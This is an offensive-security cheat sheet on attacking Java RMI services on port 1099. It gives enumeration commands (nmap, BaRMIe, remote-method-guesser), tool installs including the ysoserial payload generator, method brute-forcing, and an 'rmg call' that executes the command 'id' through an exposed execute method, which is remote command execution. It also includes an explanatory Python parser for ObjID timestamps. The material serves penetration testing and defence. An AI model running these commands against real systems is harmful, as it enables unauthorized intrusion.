# Java RMI - Port 1099

# Concepts

Java Remote Method Invocation (RMI) is a mechanism that allows an object residing in one Java virtual machine (JVM) to invoke methods on an object running in another JVM. It uses Java object serialization to marshal and unmarshal parameters, and it does not strictly define a presentation layer, so the data exchanged is often arbitrary Java classes.

Key Technical Details:

  • Registry: The RMI Registry (default port 1099) acts as a directory service, mapping logical names to object references.
  • Serialization: Heavily relies on Java Serialization, making it a frequent vector for Insecure Deserialization attacks.
  • Dynamic Class Loading: Can load classes from remote URLs (codebase), historically leading to RCE if not properly restricted (JEP 290).

# Enumeration

# Nmap

Identify the RMI registry and dump the exposed methods.

nmap -sV -p 1099 --script rmi-dumpregistry <target>

# BaRMIe

Enumeration and attack tool for RMI services.

java -jar BaRMIe_v1.0.1.jar -h 192.168.1.10 -p 1099

# RMG Recon

GitHub link: https://github.com/qtc-de/remote-method-guesser

remote-method-guesser (rmg) is a Java RMI vulnerability scanner and can be used to identify and verify common security vulnerabilities on Java RMI endpoints.

# Install

First, install Maven:

sudo apt-get -y install maven

Then clone the repository and build it:

git clone https://github.com/qtc-de/remote-method-guesser
cd remote-method-guesser
mvn package

Once installed, download ysoserial.jar:

wget https://github.com/frohoff/ysoserial/releases/download/v0.0.6/ysoserial-all.jar

# Enumerate

rmg enum <ip> 9010

# Timestamp

Take the ObjID from the previous result:

rmg objid '[55ff5a5d:17e0501b054:-7ff8, -4004948013687638236]'
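What the identifier passed to `rmg objid` encodes, as an added example that is not part of the original page or of rmg: a `java.rmi.server.ObjID` prints as `[unique:time:count, objNum]`, so the string returned to any client that can enumerate the endpoint carries a millisecond timestamp from the exporting JVM. The names `ParsedObjID` and `parse_objid` are this example's own; the well-known object numbers (0 Registry, 1 Activator, 2 DGC) come from the JDK's `ObjID` class.

```python
import re
from dataclasses import dataclass
from datetime import datetime, timedelta, timezone

# Object numbers reserved by java.rmi.server.ObjID; their UID part is 0:0:0.
WELL_KNOWN = {0: "Registry", 1: "Activator", 2: "DGC"}
EPOCH = datetime(1970, 1, 1, tzinfo=timezone.utc)
# ObjID.toString(): "[unique:time:count, objNum]", UID fields in signed hex.
OBJID_RE = re.compile(
    r"\[(-?[0-9a-f]+):(-?[0-9a-f]+):(-?[0-9a-f]+),\s*(-?\d+)\]", re.I)


@dataclass(frozen=True)
class ParsedObjID:  # hypothetical helper type, not part of rmg or the JDK
    unique: int   # per-JVM identifier (32-bit)
    time_ms: int  # milliseconds since the Unix epoch (64-bit)
    count: int    # counter within that JVM (16-bit)
    obj_num: int  # object number (64-bit)

    @property
    def well_known(self):
        """Name of the reserved system object, or None for an exported object."""
        if (self.unique, self.time_ms, self.count) == (0, 0, 0):
            return WELL_KNOWN.get(self.obj_num)
        return None

    @property
    def created_utc(self):
        """Wall-clock time embedded in the UID, or None when it carries none."""
        if self.time_ms == 0:
            return None
        return EPOCH + timedelta(milliseconds=self.time_ms)


def parse_objid(text):
    m = OBJID_RE.fullmatch(text.strip())
    if not m:
        raise ValueError(f"not an ObjID string: {text!r}")
    unique, time_ms, count = (int(g, 16) for g in m.group(1, 2, 3))
    obj_num = int(m.group(4))
    limits = ((unique, 31), (time_ms, 63), (count, 15), (obj_num, 63))
    if any(not -(1 << b) <= v < (1 << b) for v, b in limits):
        raise ValueError(f"field out of range in {text!r}")
    return ParsedObjID(unique, time_ms, count, obj_num)


if __name__ == "__main__":
    for s in ("[55ff5a5d:17e0501b054:-7ff8, -4004948013687638236]", "[0:0:0, 0]"):
        oid = parse_objid(s)
        print(s, "->", oid.well_known or oid.created_utc.isoformat())
```

The embedded time can be correlated with service start or restart entries in the host's own logs, which is why an exposed ObjID counts as an information leak in its own right.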

# Execute Method (Shell)

This only works if the method is available on the RMI service.

rmg call 172.17.0.2 9010 '"id"' --bound-name plain-server --signature "String execute(String dummy)" --plugin GenericPrint.jar

# Brute Force Methods

rmg guess 172.17.0.2 9010

# Beanshooter

GitHub link: https://github.com/qtc-de/beanshooter

# Install

First, install Maven:

sudo apt-get -y install maven

Clone the repository and build it:

git clone https://github.com/qtc-de/beanshooter
cd beanshooter
mvn package

Alternatively, download the JAR file from the release page and run it:

java -jar file.jar -h